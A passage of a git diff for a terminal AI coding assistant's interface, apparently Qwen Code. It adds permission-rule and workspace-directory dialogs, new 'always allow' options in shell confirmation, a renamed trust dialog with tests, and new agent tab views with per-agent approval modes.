directory:')} + + 0 ? handleDirTabComplete : undefined} + onUp={dirCompletions.length > 0 ? handleDirCompletionUp : undefined} + onDown={ + dirCompletions.length > 0 ? handleDirCompletionDown : undefined + } + placeholder={t('Enter directory path…')} + isActive={true} + validationErrors={dirInputError ? [dirInputError] : []} + /> + + {/* Filesystem completions: ↑/↓ to navigate, Tab to apply */} + {dirCompletions.length > 0 && ( + + {dirCompletions.map((completion, idx) => { + const name = nodePath.basename(completion); + const isSelected = idx === completionIndex; + return ( + + + {`${name}/`} + + {` directory`} + + ); + })} + + )} + + + {t('Tab to complete · Enter to add · Esc to cancel')} + + + + ); + } + + // --- Workspace tab: remove directory confirmation --- + if ( + activeTab.id === 'workspace' && + view === 'ws-remove-confirm' && + removeDirTarget + ) { + return ( + + + {t('Remove directory?')} + + + {removeDirTarget} + + + + {t( + 'Are you sure you want to remove this directory from the workspace?', + )} + + + + + {t('Enter to confirm · Esc to cancel')} + + + + ); + } + + // --- Workspace tab: directory list (default) --- + if (activeTab.id === 'workspace') { + const initialDirArray = Array.from(initialDirs); + return ( + + + + {t( + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.', + )} + + + {/* Initial (non-removable) dirs: shown inline with dash, same visual level as list */} + {initialDirArray.map((dir, idx) => ( + + {'- '} + {dir} + + {idx === 0 + ? t(' (Original working directory)') + : t(' (from settings)')} + + + ))} + {/* Selectable list: runtime-added dirs + 'Add directory…' at end */} + + + + ); + } + + // --- Render views --- + + if (view === 'add-rule-input') { + return ( + + + + {t('Add {{type}} permission rule', { type: activeTab.id })} + + + + {t( + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.', + )} + + + {t('e.g.,')} WebFetch {t('or')}{' '} + Bash(ls:*) + + + + + + + + + {t('Enter to submit · Esc to cancel')} + + + + ); + } + + if (view === 'add-rule-scope') { + const scopeItems = getPermScopeItems(); + return ( + + + + {t('Add {{type}} permission rule', { type: activeTab.id })} + + + + {pendingRuleText} + + {describeRule(pendingRuleText)} + + + + {t('Where should this rule be saved?')} + ({ + label: `${s.label} ${s.description}`, + value: s.value, + key: s.key, + }))} + onSelect={handleScopeSelect} + isFocused={true} + showNumbers={true} + /> + + + + {t('Enter to confirm · Esc to cancel')} + + + + ); + } + + if (view === 'delete-confirm' && deleteTarget) { + return ( + + + + {t('Delete {{type}} rule?', { type: deleteTarget.type })} + + + + {deleteTarget.rule.raw} + + {describeRule(deleteTarget.rule.raw)} + + + {scopeLabel(deleteTarget.scope)} + + + + + {t('Are you sure you want to delete this permission rule?')} + + + + + {t('Enter to confirm · Esc to cancel')} + + + + ); + } + + // --- Default: rule-list view --- + + return ( + + + {activeTab.description} + {/* Search box */} + + {'> '} + {searchQuery ? ( + {searchQuery} + ) : ( + {t('Search…')} + )} + + + {/* Rule list */} + + + + ); +} + +// --------------------------------------------------------------------------- +// Sub-components +// --------------------------------------------------------------------------- + +function TabBar({ + tabs, + activeIndex, +}: { + tabs: Tab[]; + activeIndex: number; +}): React.JSX.Element { + return ( + + + {t('Permissions:')}{' '} + + {tabs.map((tab, i) => ( + + {i === activeIndex ? ( + + {` ${tab.label} `} + + ) : ( + {` ${tab.label} `} + )} + + ))} + {t('(←/→ or tab to cycle)')} + + ); +} + +function FooterHint({ view }: { view: DialogView }): React.JSX.Element { + if (view !== 'rule-list' && view !== 'ws-dir-list') return <>; + return ( + + + {t( + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel', + )} + + + ); +} diff --git a/packages/cli/src/ui/components/PlanSummaryDisplay.tsx b/packages/cli/src/ui/components/PlanSummaryDisplay.tsx index c827b9d86..a856bcdc4 100644 --- a/packages/cli/src/ui/components/PlanSummaryDisplay.tsx +++ b/packages/cli/src/ui/components/PlanSummaryDisplay.tsx @@ -21,12 +21,13 @@ export const PlanSummaryDisplay: React.FC = ({ availableHeight, childWidth, }) => { - const { message, plan } = data; + const { message, plan, rejected } = data; + const messageColor = rejected ? Colors.AccentYellow : Colors.AccentGreen; return ( - + {message} diff --git a/packages/cli/src/ui/components/ShellConfirmationDialog.test.tsx b/packages/cli/src/ui/components/ShellConfirmationDialog.test.tsx index bacf055fa..0f3d40652 100644 --- a/packages/cli/src/ui/components/ShellConfirmationDialog.test.tsx +++ b/packages/cli/src/ui/components/ShellConfirmationDialog.test.tsx @@ -33,13 +33,13 @@ describe('ShellConfirmationDialog', () => { expect(select).toContain('Yes, allow once'); }); - it('calls onConfirm with ProceedAlways when "Yes, allow always for this session" is selected', () => { + it('calls onConfirm with ProceedAlwaysProject when "Always allow in this project" is selected', () => { const { lastFrame } = renderWithProviders( , ); const select = lastFrame()!.toString(); // Simulate selecting the second option - expect(select).toContain('Yes, allow always for this session'); + expect(select).toContain('Always allow in this project'); }); it('calls onConfirm with Cancel when "No (esc)" is selected', () => { diff --git a/packages/cli/src/ui/components/ShellConfirmationDialog.tsx b/packages/cli/src/ui/components/ShellConfirmationDialog.tsx index d83bf9bca..5d6986efc 100644 --- a/packages/cli/src/ui/components/ShellConfirmationDialog.tsx +++ b/packages/cli/src/ui/components/ShellConfirmationDialog.tsx @@ -57,9 +57,14 @@ export const ShellConfirmationDialog: React.FC< key: 'Yes, allow once', }, { - label: t('Yes, allow always for this session'), - value: ToolConfirmationOutcome.ProceedAlways, - key: 'Yes, allow always for this session', + label: t('Always allow in this project'), + value: ToolConfirmationOutcome.ProceedAlwaysProject, + key: 'Always allow in this project', + }, + { + label: t('Always allow for this user'), + value: ToolConfirmationOutcome.ProceedAlwaysUser, + key: 'Always allow for this user', }, { label: t('No (esc)'), diff --git a/packages/cli/src/ui/components/PermissionsModifyTrustDialog.test.tsx b/packages/cli/src/ui/components/TrustDialog.test.tsx similarity index 83% rename from packages/cli/src/ui/components/PermissionsModifyTrustDialog.test.tsx rename to packages/cli/src/ui/components/TrustDialog.test.tsx index 15d6948d8..6ca6133dc 100644 --- a/packages/cli/src/ui/components/PermissionsModifyTrustDialog.test.tsx +++ b/packages/cli/src/ui/components/TrustDialog.test.tsx @@ -9,13 +9,13 @@ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; import type { Mock } from 'vitest'; import { renderWithProviders } from '../../test-utils/render.js'; -import { PermissionsModifyTrustDialog } from './PermissionsModifyTrustDialog.js'; +import { TrustDialog } from './TrustDialog.js'; import { TrustLevel } from '../../config/trustedFolders.js'; import { waitFor, act } from '@testing-library/react'; import * as processUtils from '../../utils/processUtils.js'; -import { usePermissionsModifyTrust } from '../hooks/usePermissionsModifyTrust.js'; +import { useTrustModify } from '../hooks/useTrustModify.js'; -// Hoist mocks for dependencies of the usePermissionsModifyTrust hook +// Hoist mocks for dependencies of the useTrustModify hook const mockedCwd = vi.hoisted(() => vi.fn()); const mockedLoadTrustedFolders = vi.hoisted(() => vi.fn()); const mockedIsWorkspaceTrusted = vi.hoisted(() => vi.fn()); @@ -39,16 +39,16 @@ vi.mock('../../config/trustedFolders.js', () => ({ }, })); -vi.mock('../hooks/usePermissionsModifyTrust.js'); +vi.mock('../hooks/useTrustModify.js'); -describe('PermissionsModifyTrustDialog', () => { +describe('TrustDialog', () => { let mockUpdateTrustLevel: Mock; let mockCommitTrustLevelChange: Mock; beforeEach(() => { mockUpdateTrustLevel = vi.fn(); mockCommitTrustLevelChange = vi.fn(); - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: false, @@ -66,7 +66,7 @@ describe('PermissionsModifyTrustDialog', () => { it('should render the main dialog with current trust level', async () => { const { lastFrame } = renderWithProviders( - , + , ); await waitFor(() => { @@ -77,7 +77,7 @@ describe('PermissionsModifyTrustDialog', () => { }); it('should display the inherited trust note from parent', async () => { - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: true, @@ -88,7 +88,7 @@ describe('PermissionsModifyTrustDialog', () => { isFolderTrustEnabled: true, }); const { lastFrame } = renderWithProviders( - , + , ); await waitFor(() => { @@ -99,7 +99,7 @@ describe('PermissionsModifyTrustDialog', () => { }); it('should display the inherited trust note from IDE', async () => { - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: false, @@ -110,7 +110,7 @@ describe('PermissionsModifyTrustDialog', () => { isFolderTrustEnabled: true, }); const { lastFrame } = renderWithProviders( - , + , ); await waitFor(() => { @@ -123,7 +123,7 @@ describe('PermissionsModifyTrustDialog', () => { it('should call onExit when escape is pressed', async () => { const onExit = vi.fn(); const { stdin, lastFrame } = renderWithProviders( - , + , ); await waitFor(() => expect(lastFrame()).not.toContain('Loading...')); @@ -141,7 +141,7 @@ describe('PermissionsModifyTrustDialog', () => { const mockRelaunchApp = vi .spyOn(processUtils, 'relaunchApp') .mockResolvedValue(undefined); - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: false, @@ -154,7 +154,7 @@ describe('PermissionsModifyTrustDialog', () => { const onExit = vi.fn(); const { stdin, lastFrame } = renderWithProviders( - , + , ); await waitFor(() => expect(lastFrame()).not.toContain('Loading...')); @@ -171,7 +171,7 @@ describe('PermissionsModifyTrustDialog', () => { }); it('should not commit when escape is pressed during restart prompt', async () => { - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: false, @@ -184,7 +184,7 @@ describe('PermissionsModifyTrustDialog', () => { const onExit = vi.fn(); const { stdin, lastFrame } = renderWithProviders( - , + , ); await waitFor(() => expect(lastFrame()).not.toContain('Loading...')); diff --git a/packages/cli/src/ui/components/PermissionsModifyTrustDialog.tsx b/packages/cli/src/ui/components/TrustDialog.tsx similarity index 92% rename from packages/cli/src/ui/components/PermissionsModifyTrustDialog.tsx rename to packages/cli/src/ui/components/TrustDialog.tsx index dfed5ba42..ed2f202a8 100644 --- a/packages/cli/src/ui/components/PermissionsModifyTrustDialog.tsx +++ b/packages/cli/src/ui/components/TrustDialog.tsx @@ -8,13 +8,13 @@ import { Box, Text } from 'ink'; import type React from 'react'; import { TrustLevel } from '../../config/trustedFolders.js'; import { useKeypress } from '../hooks/useKeypress.js'; -import { usePermissionsModifyTrust } from '../hooks/usePermissionsModifyTrust.js'; +import { useTrustModify } from '../hooks/useTrustModify.js'; import { theme } from '../semantic-colors.js'; import { RadioButtonSelect } from './shared/RadioButtonSelect.js'; import { relaunchApp } from '../../utils/processUtils.js'; import { type UseHistoryManagerReturn } from '../hooks/useHistoryManager.js'; -interface PermissionsModifyTrustDialogProps { +interface TrustDialogProps { onExit: () => void; addItem: UseHistoryManagerReturn['addItem']; } @@ -37,10 +37,10 @@ const TRUST_LEVEL_ITEMS = [ }, ]; -export function PermissionsModifyTrustDialog({ +export function TrustDialog({ onExit, addItem, -}: PermissionsModifyTrustDialogProps): React.JSX.Element { +}: TrustDialogProps): React.JSX.Element { const { cwd, currentTrustLevel, @@ -49,7 +49,7 @@ export function PermissionsModifyTrustDialog({ needsRestart, updateTrustLevel, commitTrustLevelChange, - } = usePermissionsModifyTrust(onExit, addItem); + } = useTrustModify(onExit, addItem); useKeypress( (key) => { diff --git a/packages/cli/src/ui/components/__snapshots__/LoadingIndicator.test.tsx.snap b/packages/cli/src/ui/components/__snapshots__/LoadingIndicator.test.tsx.snap index 3d472f97e..f9236b52a 100644 --- a/packages/cli/src/ui/components/__snapshots__/LoadingIndicator.test.tsx.snap +++ b/packages/cli/src/ui/components/__snapshots__/LoadingIndicator.test.tsx.snap @@ -1,6 +1,6 @@ // Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html exports[` > should truncate long primary text instead of wrapping 1`] = ` -"MockResponding This is an extremely long loading phrase that should be truncated in t (esc to -Spinner cancel, 5s)" +" MockResponding This is an extremely long loading phrase that should be truncated in (5s · esc to + Spinner cancel)" `; diff --git a/packages/cli/src/ui/components/__snapshots__/LoopDetectionConfirmation.test.tsx.snap b/packages/cli/src/ui/components/__snapshots__/LoopDetectionConfirmation.test.tsx.snap index da3c1f9a1..ef8f8a006 100644 --- a/packages/cli/src/ui/components/__snapshots__/LoopDetectionConfirmation.test.tsx.snap +++ b/packages/cli/src/ui/components/__snapshots__/LoopDetectionConfirmation.test.tsx.snap @@ -7,7 +7,7 @@ exports[`LoopDetectionConfirmation > renders correctly 1`] = ` │ This can happen due to repetitive tool calls or other model behavior. Do you want to keep loop │ │ detection enabled or disable it for this session? │ │ │ - │ ● 1. Keep loop detection enabled (esc) │ + │ › 1. Keep loop detection enabled (esc) │ │ 2. Disable loop detection for this session │ │ │ │ Note: To disable loop detection checks for all future sessions, set "model.skipLoopDetection" to │ diff --git a/packages/cli/src/ui/components/__snapshots__/ShellConfirmationDialog.test.tsx.snap b/packages/cli/src/ui/components/__snapshots__/ShellConfirmationDialog.test.tsx.snap index 8c9ceb298..ecd4c0652 100644 --- a/packages/cli/src/ui/components/__snapshots__/ShellConfirmationDialog.test.tsx.snap +++ b/packages/cli/src/ui/components/__snapshots__/ShellConfirmationDialog.test.tsx.snap @@ -13,9 +13,10 @@ exports[`ShellConfirmationDialog > renders correctly 1`] = ` │ │ │ Do you want to proceed? │ │ │ - │ ● 1. Yes, allow once │ - │ 2. Yes, allow always for this session │ - │ 3. No (esc) │ + │ › 1. Yes, allow once │ + │ 2. Always allow in this project │ + │ 3. Always allow for this user │ + │ 4. No (esc) │ │ │ ╰──────────────────────────────────────────────────────────────────────────────────────────────────╯" `; diff --git a/packages/cli/src/ui/components/__snapshots__/ThemeDialog.test.tsx.snap b/packages/cli/src/ui/components/__snapshots__/ThemeDialog.test.tsx.snap index d254c32df..479bfe3c1 100644 --- a/packages/cli/src/ui/components/__snapshots__/ThemeDialog.test.tsx.snap +++ b/packages/cli/src/ui/components/__snapshots__/ThemeDialog.test.tsx.snap @@ -5,7 +5,7 @@ exports[`ThemeDialog Snapshots > should render correctly in scope selector mode │ │ │ > Apply To │ │ │ -│ ● 1. User Settings │ +│ › 1. User Settings │ │ 2. Workspace Settings │ │ │ │ (Use Enter to apply scope, Tab to go back) │ @@ -19,7 +19,7 @@ exports[`ThemeDialog Snapshots > should render correctly in theme selection mode │ > Select Theme Preview │ │ ▲ ┌─────────────────────────────────────────────────┐ │ │ 1. Qwen Light Light │ │ │ -│ ● 2. Qwen Dark Dark │ 1 # function │ │ +│ › 2. Qwen Dark Dark │ 1 # function │ │ │ 3. ANSI Dark │ 2 def fibonacci(n): │ │ │ 4. Atom One Dark │ 3 a, b = 0, 1 │ │ │ 5. Ayu Dark │ 4 for _ in range(n): │ │ diff --git a/packages/cli/src/ui/components/agent-view/AgentChatView.tsx b/packages/cli/src/ui/components/agent-view/AgentChatView.tsx new file mode 100644 index 000000000..485316436 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentChatView.tsx @@ -0,0 +1,272 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentChatView — displays a single in-process agent's conversation. + * + * Renders the agent's message history using HistoryItemDisplay — the same + * component used by the main agent view. AgentMessage[] is converted to + * HistoryItem[] by agentMessagesToHistoryItems() so all 27 HistoryItem types + * are available without duplicating rendering logic. + * + * Layout: + * - Static area: finalized messages (efficient Ink ) + * - Live area: tool groups still executing / awaiting confirmation + * - Status line: spinner while the agent is running + * + * Model text output is shown only after each round completes (no live + * streaming), which avoids per-chunk re-renders and keeps the display simple. + */ + +import { Box, Text, Static } from 'ink'; +import { useMemo, useState, useEffect, useCallback, useRef } from 'react'; +import { + AgentStatus, + AgentEventType, + getGitBranch, + type AgentStatusChangeEvent, +} from '@qwen-code/qwen-code-core'; +import { + useAgentViewState, + useAgentViewActions, +} from '../../contexts/AgentViewContext.js'; +import { useUIState } from '../../contexts/UIStateContext.js'; +import { useTerminalSize } from '../../hooks/useTerminalSize.js'; +import { HistoryItemDisplay } from '../HistoryItemDisplay.js'; +import { ToolCallStatus } from '../../types.js'; +import { theme } from '../../semantic-colors.js'; +import { GeminiRespondingSpinner } from '../GeminiRespondingSpinner.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { agentMessagesToHistoryItems } from './agentHistoryAdapter.js'; +import { AgentHeader } from './AgentHeader.js'; + +// ─── Main Component ───────────────────────────────────────── + +interface AgentChatViewProps { + agentId: string; +} + +export const AgentChatView = ({ agentId }: AgentChatViewProps) => { + const { agents } = useAgentViewState(); + const { setAgentShellFocused } = useAgentViewActions(); + const uiState = useUIState(); + const { historyRemountKey, availableTerminalHeight, constrainHeight } = + uiState; + const { columns: terminalWidth } = useTerminalSize(); + const agent = agents.get(agentId); + const contentWidth = terminalWidth - 4; + + // Force re-render on message updates and status changes. + // STREAM_TEXT is deliberately excluded — model text is shown only after + // each round completes (via committed messages), avoiding per-chunk re-renders. + const [, setRenderTick] = useState(0); + const tickRef = useRef(0); + const forceRender = useCallback(() => { + tickRef.current += 1; + setRenderTick(tickRef.current); + }, []); + + useEffect(() => { + if (!agent) return; + + const emitter = agent.interactiveAgent.getEventEmitter(); + if (!emitter) return; + + const onStatusChange = (_event: AgentStatusChangeEvent) => forceRender(); + const onToolCall = () => forceRender(); + const onToolResult = () => forceRender(); + const onRoundEnd = () => forceRender(); + const onApproval = () => forceRender(); + const onOutputUpdate = () => forceRender(); + + emitter.on(AgentEventType.STATUS_CHANGE, onStatusChange); + emitter.on(AgentEventType.TOOL_CALL, onToolCall); + emitter.on(AgentEventType.TOOL_RESULT, onToolResult); + emitter.on(AgentEventType.ROUND_END, onRoundEnd); + emitter.on(AgentEventType.TOOL_WAITING_APPROVAL, onApproval); + emitter.on(AgentEventType.TOOL_OUTPUT_UPDATE, onOutputUpdate); + + return () => { + emitter.off(AgentEventType.STATUS_CHANGE, onStatusChange); + emitter.off(AgentEventType.TOOL_CALL, onToolCall); + emitter.off(AgentEventType.TOOL_RESULT, onToolResult); + emitter.off(AgentEventType.ROUND_END, onRoundEnd); + emitter.off(AgentEventType.TOOL_WAITING_APPROVAL, onApproval); + emitter.off(AgentEventType.TOOL_OUTPUT_UPDATE, onOutputUpdate); + }; + }, [agent, forceRender]); + + const interactiveAgent = agent?.interactiveAgent; + const messages = interactiveAgent?.getMessages() ?? []; + const pendingApprovals = interactiveAgent?.getPendingApprovals(); + const liveOutputs = interactiveAgent?.getLiveOutputs(); + const shellPids = interactiveAgent?.getShellPids(); + const status = interactiveAgent?.getStatus(); + const isRunning = + status === AgentStatus.RUNNING || status === AgentStatus.INITIALIZING; + + // Derive the active PTY PID: first shell PID among currently-executing tools. + // Resets naturally to undefined when the tool finishes (shellPids cleared). + const activePtyId = + shellPids && shellPids.size > 0 + ? shellPids.values().next().value + : undefined; + + // Track whether the user has toggled input focus into the embedded shell. + // Mirrors the main agent's embeddedShellFocused in AppContainer. + const [embeddedShellFocused, setEmbeddedShellFocusedLocal] = useState(false); + + // Sync to AgentViewContext so AgentTabBar can suppress arrow-key navigation + // when an agent's embedded shell is focused. + useEffect(() => { + setAgentShellFocused(embeddedShellFocused); + return () => setAgentShellFocused(false); + }, [embeddedShellFocused, setAgentShellFocused]); + + // Reset focus when the shell exits (activePtyId disappears). + useEffect(() => { + if (!activePtyId) setEmbeddedShellFocusedLocal(false); + }, [activePtyId]); + + // Ctrl+F: toggle shell input focus when a PTY is active. + useKeypress( + (key) => { + if (key.ctrl && key.name === 'f') { + if (activePtyId || embeddedShellFocused) { + setEmbeddedShellFocusedLocal((prev) => !prev); + } + } + }, + { isActive: true }, + ); + + // Convert AgentMessage[] → HistoryItem[] via adapter. + // tickRef.current in deps ensures we rebuild when events fire even if + // messages.length and pendingApprovals.size haven't changed (e.g. a + // tool result updates an existing entry in place). + const allItems = useMemo( + () => + agentMessagesToHistoryItems( + messages, + pendingApprovals ?? new Map(), + liveOutputs, + shellPids, + ), + // eslint-disable-next-line react-hooks/exhaustive-deps + [ + agentId, + messages.length, + pendingApprovals?.size, + liveOutputs?.size, + shellPids?.size, + tickRef.current, + ], + ); + + // Split into committed (Static) and pending (live area). + // Any tool_group with an Executing or Confirming tool — plus everything + // after it — stays in the live area so confirmation dialogs remain + // interactive (Ink's cannot receive input). + const splitIndex = useMemo(() => { + for (let idx = allItems.length - 1; idx >= 0; idx--) { + const item = allItems[idx]!; + if ( + item.type === 'tool_group' && + item.tools.some( + (t) => + t.status === ToolCallStatus.Executing || + t.status === ToolCallStatus.Confirming, + ) + ) { + return idx; + } + } + return allItems.length; // all committed + }, [allItems]); + + const committedItems = allItems.slice(0, splitIndex); + const pendingItems = allItems.slice(splitIndex); + + const core = interactiveAgent?.getCore(); + const agentWorkingDir = core?.runtimeContext.getTargetDir() ?? ''; + // Cache the branch — it won't change during the agent's lifetime and + // getGitBranch uses synchronous execSync which blocks the render loop. + const agentGitBranch = useMemo( + () => (agentWorkingDir ? getGitBranch(agentWorkingDir) : ''), + // eslint-disable-next-line react-hooks/exhaustive-deps + [agentId], + ); + + if (!agent || !interactiveAgent || !core) { + return ( + + + Agent "{agentId}" not found. + + + ); + } + + const agentModelId = core.modelConfig.model ?? ''; + + return ( + + {/* Committed message history. + key includes historyRemountKey: when refreshStatic() clears the + terminal it bumps the key, forcing Static to remount and re-emit + all items on the cleared screen. */} + , + ...committedItems.map((item) => ( + + )), + ]} + > + {(item) => item} + + + {/* Live area — tool groups awaiting confirmation or still executing. + Must remain outside Static so confirmation dialogs are interactive. + Pass PTY state so ShellInputPrompt is reachable via Ctrl+F. */} + {pendingItems.map((item) => ( + + ))} + + {/* Spinner */} + {isRunning && ( + + + + )} + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/AgentComposer.tsx b/packages/cli/src/ui/components/agent-view/AgentComposer.tsx new file mode 100644 index 000000000..d26d5db2f --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentComposer.tsx @@ -0,0 +1,308 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentComposer — footer area for in-process agent tabs. + * + * Replaces the main Composer when an agent tab is active so that: + * - The loading indicator reflects the agent's status (not the main agent) + * - The input prompt sends messages to the agent (via enqueueMessage) + * - Keyboard events are scoped — no conflict with the main InputPrompt + * + * Wraps its content in a local StreamingContext.Provider so reusable + * components like LoadingIndicator and GeminiRespondingSpinner read the + * agent's derived streaming state instead of the main agent's. + */ + +import { Box, Text, useStdin } from 'ink'; +import { useCallback, useEffect, useMemo, useState } from 'react'; +import { + AgentStatus, + isTerminalStatus, + ApprovalMode, + APPROVAL_MODES, +} from '@qwen-code/qwen-code-core'; +import { + useAgentViewState, + useAgentViewActions, +} from '../../contexts/AgentViewContext.js'; +import { useConfig } from '../../contexts/ConfigContext.js'; +import { StreamingContext } from '../../contexts/StreamingContext.js'; +import { StreamingState } from '../../types.js'; +import { useTerminalSize } from '../../hooks/useTerminalSize.js'; +import { useAgentStreamingState } from '../../hooks/useAgentStreamingState.js'; +import { useKeypress, type Key } from '../../hooks/useKeypress.js'; +import { useTextBuffer } from '../shared/text-buffer.js'; +import { calculatePromptWidths } from '../../utils/layoutUtils.js'; +import { BaseTextInput } from '../BaseTextInput.js'; +import { LoadingIndicator } from '../LoadingIndicator.js'; +import { QueuedMessageDisplay } from '../QueuedMessageDisplay.js'; +import { AgentFooter } from './AgentFooter.js'; +import { keyMatchers, Command } from '../../keyMatchers.js'; +import { theme } from '../../semantic-colors.js'; +import { t } from '../../../i18n/index.js'; + +// ─── Types ────────────────────────────────────────────────── + +interface AgentComposerProps { + agentId: string; +} + +// ─── Component ────────────────────────────────────────────── + +export const AgentComposer: React.FC = ({ agentId }) => { + const { agents, agentTabBarFocused, agentShellFocused, agentApprovalModes } = + useAgentViewState(); + const { + setAgentInputBufferText, + setAgentTabBarFocused, + setAgentApprovalMode, + } = useAgentViewActions(); + const agent = agents.get(agentId); + const interactiveAgent = agent?.interactiveAgent; + + const config = useConfig(); + const { columns: terminalWidth } = useTerminalSize(); + const { inputWidth } = calculatePromptWidths(terminalWidth); + const { stdin, setRawMode } = useStdin(); + + const { + status, + streamingState, + isInputActive, + elapsedTime, + lastPromptTokenCount, + } = useAgentStreamingState(interactiveAgent); + + // ── Escape to cancel the active agent round ── + + useKeypress( + (key) => { + if ( + key.name === 'escape' && + streamingState === StreamingState.Responding + ) { + interactiveAgent?.cancelCurrentRound(); + } + }, + { + isActive: + streamingState === StreamingState.Responding && !agentShellFocused, + }, + ); + + // ── Shift+Tab to cycle this agent's approval mode ── + + const agentApprovalMode = + agentApprovalModes.get(agentId) ?? ApprovalMode.DEFAULT; + + useKeypress( + (key) => { + const isShiftTab = key.shift && key.name === 'tab'; + const isWindowsTab = + process.platform === 'win32' && + key.name === 'tab' && + !key.ctrl && + !key.meta; + if (isShiftTab || isWindowsTab) { + const currentIndex = APPROVAL_MODES.indexOf(agentApprovalMode); + const nextIndex = + currentIndex === -1 ? 0 : (currentIndex + 1) % APPROVAL_MODES.length; + setAgentApprovalMode(agentId, APPROVAL_MODES[nextIndex]!); + } + }, + { isActive: !agentShellFocused }, + ); + + // ── Input buffer (independent from main agent) ── + + const isValidPath = useCallback((): boolean => false, []); + + const buffer = useTextBuffer({ + initialText: '', + viewport: { height: 3, width: inputWidth }, + stdin, + setRawMode, + isValidPath, + }); + + // Sync agent buffer text to context so AgentTabBar can guard tab switching + useEffect(() => { + setAgentInputBufferText(buffer.text); + return () => setAgentInputBufferText(''); + }, [buffer.text, setAgentInputBufferText]); + + // When agent input is not active (agent running, completed, etc.), + // auto-focus the tab bar so arrow keys switch tabs directly. + // We also depend on streamingState so that transitions like + // WaitingForConfirmation → Responding re-trigger the effect — the + // approval keypress releases tab-bar focus (printable char handler), + // but isInputActive stays false throughout, so without this extra + // dependency the focus would never be restored. + useEffect(() => { + if (!isInputActive) { + setAgentTabBarFocused(true); + } + }, [isInputActive, streamingState, setAgentTabBarFocused]); + + // ── Focus management between input and tab bar ── + + const handleKeypress = useCallback( + (key: Key): boolean => { + // When tab bar has focus, block all non-printable keys so they don't + // act on the hidden buffer. Printable characters fall through to + // BaseTextInput naturally; the tab bar handler releases focus on the + // same event so the keystroke appears in the input immediately. + if (agentTabBarFocused) { + if ( + key.sequence && + key.sequence.length === 1 && + !key.ctrl && + !key.meta + ) { + return false; // let BaseTextInput type the character + } + return true; // consume non-printable keys + } + + // Down arrow at the bottom edge (or empty buffer) → focus the tab bar + if (keyMatchers[Command.NAVIGATION_DOWN](key)) { + if ( + buffer.text === '' || + buffer.allVisualLines.length === 1 || + buffer.visualCursor[0] === buffer.allVisualLines.length - 1 + ) { + setAgentTabBarFocused(true); + return true; + } + } + return false; + }, + [buffer, agentTabBarFocused, setAgentTabBarFocused], + ); + + // ── Message queue (accumulate while streaming, flush as one prompt on idle) ── + + const [messageQueue, setMessageQueue] = useState([]); + + // When agent becomes idle (and not terminal), flush queued messages. + useEffect(() => { + if ( + streamingState === StreamingState.Idle && + messageQueue.length > 0 && + status !== undefined && + !isTerminalStatus(status) + ) { + const combined = messageQueue.join('\n'); + setMessageQueue([]); + interactiveAgent?.enqueueMessage(combined); + } + }, [streamingState, messageQueue, interactiveAgent, status]); + + const handleSubmit = useCallback( + (text: string) => { + const trimmed = text.trim(); + if (!trimmed || !interactiveAgent) return; + if (streamingState === StreamingState.Idle) { + interactiveAgent.enqueueMessage(trimmed); + } else { + setMessageQueue((prev) => [...prev, trimmed]); + } + }, + [interactiveAgent, streamingState], + ); + + // ── Render ── + + const statusLabel = useMemo(() => { + switch (status) { + case AgentStatus.COMPLETED: + return { text: t('Completed'), color: theme.status.success }; + case AgentStatus.FAILED: + return { + text: t('Failed: {{error}}', { + error: + interactiveAgent?.getError() ?? + interactiveAgent?.getLastRoundError() ?? + 'unknown', + }), + color: theme.status.error, + }; + case AgentStatus.CANCELLED: + return { text: t('Cancelled'), color: theme.text.secondary }; + default: + return null; + } + }, [status, interactiveAgent]); + + // ── Approval-mode styling (mirrors main InputPrompt) ── + + const isYolo = agentApprovalMode === ApprovalMode.YOLO; + const isAutoAccept = agentApprovalMode !== ApprovalMode.DEFAULT; + + const statusColor = isYolo + ? theme.status.errorDim + : isAutoAccept + ? theme.status.warningDim + : undefined; + + const inputBorderColor = + !isInputActive || agentTabBarFocused + ? theme.border.default + : (statusColor ?? theme.border.focused); + + const prefixNode = ( + {isYolo ? '*' : '>'} + ); + + return ( + + + {/* Loading indicator — mirrors main Composer but reads agent's + streaming state via the overridden StreamingContext. */} + + + {/* Terminal status for completed/failed agents */} + {statusLabel && ( + + {statusLabel.text} + + )} + + + + {/* Input prompt — always visible, like the main Composer */} + + + {/* Footer: approval mode + context usage */} + + + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/AgentFooter.tsx b/packages/cli/src/ui/components/agent-view/AgentFooter.tsx new file mode 100644 index 000000000..7b05e4e47 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentFooter.tsx @@ -0,0 +1,66 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Lightweight footer for agent tabs showing approval mode + * and context usage. Mirrors the main Footer layout but without + * main-agent-specific concerns (vim mode, shell mode, exit prompts, etc.). + */ + +import type React from 'react'; +import { Box, Text } from 'ink'; +import { 